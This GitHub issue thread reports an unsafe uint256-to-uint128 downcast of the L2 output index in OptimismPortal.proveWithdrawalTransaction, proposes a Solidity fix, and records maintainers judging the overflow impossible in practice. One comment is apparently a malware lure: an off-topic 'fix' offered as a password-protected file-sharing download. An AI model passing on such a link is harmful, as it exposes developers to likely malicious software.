### ISSUE TITLE
Unsafe casting of L2 Output Index in proveWithdrawalTransaction function OptimismPortal.sol

### ISSUE THREAD

**Issue by avishkarabhishek786** [tokamak-network/tokamak-thanos#249]
**Describe the bug**
The OptimismPortal.proveWithdrawalTransaction() function has a parameter _l2OutputIndex which is downcasted from uint256 to uint128. This may result in recording invalid _l2OutputIndex if original _l2OutputIndex is out of range of uint128. 

```solidity
provenWithdrawals[withdrawalHash] = ProvenWithdrawal({
            outputRoot: outputRoot,
            timestamp: uint128(block.timestamp),
            l2OutputIndex: uint128(_l2OutputIndex)
  });
```   

[proveWithdrawalTransaction](https://github.com/tokamak-network/tokamak-thanos/blob/5ad9baac98217a0c1533969b00076d9a4443edba/packages/tokamak/contracts-bedrock/src/L1/OptimismPortal.sol#L215C5-L215C41)

**Configuration**
- Severity: Medium

**Impact**
Downcasting from uint256 to uint128 may result in loss of significant digits

**Recommendation**
In the parameter we can start with _l2OutputIndex as uint128

```solidity
function proveWithdrawalTransaction(
        Types.WithdrawalTransaction memory _tx,
        uint128 _l2OutputIndex,
        Types.OutputRootProof calldata _outputRootProof,
        bytes[] calldata _withdrawalProof
    )
```

Then for l2Oracle.getL2Output() function we could typecast it to unint256 which would not result in error.

```solidity
bytes32 outputRoot = l2Oracle.getL2Output(uint256(_l2OutputIndex)).outputRoot;
```

And record the l2OutputIndex as uint128 

```solidity
provenWithdrawals[withdrawalHash] = ProvenWithdrawal({
            outputRoot: outputRoot,
            timestamp: uint128(block.timestamp),
            l2OutputIndex: _l2OutputIndex
 });
```

This is assuming it is essential to record l2OutputIndex in ProvenWithdrawal as uint128.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by nguyenzung** [comment]
Thank you @avishkarabhishek786 

Thanos's proveWithdrawalTransaction is the same Optimism's proveWithdrawalTransaction. In theory, it is possible for lossing of significant digits, however in actual, it is impossible because uint128 is still a very big number

**Comment by boohyung** [comment]
@avishkarabhishek786 Could you check and closing this issue?

**Comment by avishkarabhishek786** [comment]
Sure @boohyung
